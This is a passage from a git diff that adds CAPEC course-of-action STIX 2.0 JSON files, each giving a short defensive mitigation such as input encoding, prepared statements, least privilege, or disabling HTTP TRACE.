manual or automated code review to uncover vulnerabilities such as buffer overflow.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca.json b/capec/course-of-action/course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca.json new file mode 100644 index 0000000000..775da7d8af --- /dev/null +++ b/capec/course-of-action/course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--446107e3-307a-4ff1-aa06-fd2379d7e402", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-90-2", + "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1.json b/capec/course-of-action/course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1.json new file mode 100644 index 0000000000..df8459eb55 --- /dev/null +++ b/capec/course-of-action/course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--60da3a2c-2a6e-4f19-9c62-a93f863efc9e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-297-0", + "description": "Leverage stateful firewalls that allow for the rejection of a packet that is not part of an existing connection.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007.json b/capec/course-of-action/course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007.json new file mode 100644 index 0000000000..4fca10fbfe --- /dev/null +++ b/capec/course-of-action/course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--61867d57-07ea-42d2-9353-9670454b734a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-97-0", + "description": "Use proven cryptographic algorithms with recommended key sizes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c.json b/capec/course-of-action/course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c.json new file mode 100644 index 0000000000..7ae1063ee3 --- /dev/null +++ b/capec/course-of-action/course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c7ea64b9-844d-48f2-ae4f-7e235227da22", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-576-0", + "description": "Identify programs (such as \"net\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e.json b/capec/course-of-action/course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e.json new file mode 100644 index 0000000000..23a48b7abc --- /dev/null +++ b/capec/course-of-action/course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7fced3b6-0e19-42ac-a824-a72d52fe2bfa", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-244-1", + "description": "Design: Utilize strict type, character, and encoding enforcement.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31.json b/capec/course-of-action/course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31.json new file mode 100644 index 0000000000..014d1c66d7 --- /dev/null +++ b/capec/course-of-action/course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9a9fce6c-109a-42fd-9335-5f877a78e3ac", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-207-0", + "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090.json b/capec/course-of-action/course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090.json new file mode 100644 index 0000000000..ac076cd471 --- /dev/null +++ b/capec/course-of-action/course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a646b29d-c756-49d2-8150-f3a11bc63490", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-509-2", + "description": "Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c.json b/capec/course-of-action/course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c.json new file mode 100644 index 0000000000..5d01734cc0 --- /dev/null +++ b/capec/course-of-action/course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--545433a6-a5ae-4ac7-ae06-23c8d738942c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-25-1", + "description": "For competing actions, use well-known libraries which implement synchronization.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f010580e-dc07-4767-a265-30e908fb80a8.json b/capec/course-of-action/course-of-action--f010580e-dc07-4767-a265-30e908fb80a8.json new file mode 100644 index 0000000000..372195866e --- /dev/null +++ b/capec/course-of-action/course-of-action--f010580e-dc07-4767-a265-30e908fb80a8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e1204b1d-697d-488c-ab75-0fa61bbfb4dc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f010580e-dc07-4767-a265-30e908fb80a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-4", + "description": "Implementation: Hide HTTP response header software information filed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34.json b/capec/course-of-action/course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34.json new file mode 100644 index 0000000000..000ddcbb7c --- /dev/null +++ b/capec/course-of-action/course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--17277507-5ae2-4bd5-9cb3-82a4c24949dd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-15-3", + "description": "Implementation: Use type conversions such as JDBC prepared statements.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55.json b/capec/course-of-action/course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55.json new file mode 100644 index 0000000000..419858abbf --- /dev/null +++ b/capec/course-of-action/course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3e33f6c3-a3ed-42a2-a6b7-c3e71ea1fc25", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-2", + "description": "Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate man in the middle attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44.json b/capec/course-of-action/course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44.json new file mode 100644 index 0000000000..1bd591f02f --- /dev/null +++ b/capec/course-of-action/course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8506defd-05fd-47ae-b06d-90516610f002", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-442-0", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d.json b/capec/course-of-action/course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d.json new file mode 100644 index 0000000000..f8c334c8c3 --- /dev/null +++ b/capec/course-of-action/course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--675d4f1a-ee3c-4bb4-9cd6-f0df2a82369c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-107-0", + "description": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167.json b/capec/course-of-action/course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167.json new file mode 100644 index 0000000000..53b8830f79 --- /dev/null +++ b/capec/course-of-action/course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--721e0836-2eec-4566-bf7c-bcd26f7b2bce", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-193-1", + "description": "Implementation: Only allow known files to be included (whitelist)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d.json b/capec/course-of-action/course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d.json new file mode 100644 index 0000000000..9ede0cd4b2 --- /dev/null +++ b/capec/course-of-action/course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f7621fb3-db3c-43bd-b880-0f40f2643c24", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-1", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2.json b/capec/course-of-action/course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2.json new file mode 100644 index 0000000000..20f60f794b --- /dev/null +++ b/capec/course-of-action/course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e1789c78-6352-4ff6-aaf4-81a183303411", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-555-0", + "description": "Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0.json b/capec/course-of-action/course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0.json new file mode 100644 index 0000000000..ba5f9fc8af --- /dev/null +++ b/capec/course-of-action/course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ba5d37f4-d66f-47ed-b5fc-b9875102ec72", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-04-25T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-478-0", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97.json b/capec/course-of-action/course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97.json new file mode 100644 index 0000000000..99efaccfc1 --- /dev/null +++ b/capec/course-of-action/course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4d01d78f-e91c-478d-8cab-7236eb508545", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-467-0", + "description": "\n Usage: Users should always explicitly log out from the social networking sites when done using them.\n Usage: Users should not open other tabs in the browser when using a social networking site.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c.json b/capec/course-of-action/course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c.json new file mode 100644 index 0000000000..59a9036eb7 --- /dev/null +++ b/capec/course-of-action/course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--37ed9952-7b5f-497d-8296-d57338ee8b44", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-494-0", + "description": "This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \"IF FO=1 and PROTOCOL=TCP then DROP PACKET\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c.json b/capec/course-of-action/course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c.json new file mode 100644 index 0000000000..ff84c3e4f4 --- /dev/null +++ b/capec/course-of-action/course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a5fc1429-2d3e-46a7-b10e-fb3fb9d93b75", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-35-3", + "description": "Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3.json b/capec/course-of-action/course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3.json new file mode 100644 index 0000000000..3dcc642686 --- /dev/null +++ b/capec/course-of-action/course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d502bb09-d7d9-4d3a-825a-15a31d5203a0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-643-0", + "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using whitelisting tools.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567.json b/capec/course-of-action/course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567.json new file mode 100644 index 0000000000..2bd783e0ac --- /dev/null +++ b/capec/course-of-action/course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7aa5d781-87d1-4d4c-afb7-da5df141a6d7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-104-4", + "description": "Ensure proper HTML output encoding before writing user supplied data to the page", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b.json b/capec/course-of-action/course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b.json new file mode 100644 index 0000000000..d29feaf2b9 --- /dev/null +++ b/capec/course-of-action/course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4610a14d-6067-4639-8b96-37f489bf2154", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-77-2", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d.json b/capec/course-of-action/course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d.json new file mode 100644 index 0000000000..7ded532d28 --- /dev/null +++ b/capec/course-of-action/course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7d550470-4d3f-4724-96ac-e64b4652827c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-270-0", + "description": "Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13.json b/capec/course-of-action/course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13.json new file mode 100644 index 0000000000..f235dcce93 --- /dev/null +++ b/capec/course-of-action/course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9e2fc911-843b-4796-81ba-daf6847727de", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-78-0", + "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9.json b/capec/course-of-action/course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9.json new file mode 100644 index 0000000000..bec3dd6f1c --- /dev/null +++ b/capec/course-of-action/course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b4834f4f-55f1-4fe2-b471-e5e7ee46ee81", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-42-0", + "description": "Stay up to date with third party vendor patches", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4.json b/capec/course-of-action/course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4.json new file mode 100644 index 0000000000..fbf38eba1f --- /dev/null +++ b/capec/course-of-action/course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--628a0f96-804e-4621-a2ab-ee363afd64ad", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-49-2", + "description": "Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2.json b/capec/course-of-action/course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2.json new file mode 100644 index 0000000000..50b81492f6 --- /dev/null +++ b/capec/course-of-action/course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2a77dbe2-214b-4249-a699-4faf41c6d8b2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-92-4", + "description": "", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb.json b/capec/course-of-action/course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb.json new file mode 100644 index 0000000000..1e664e5e85 --- /dev/null +++ b/capec/course-of-action/course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--204f76a7-51b3-4eb3-8023-6ce48181236d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-218-0", + "description": "Implementation: Clients should only trust UDDI, 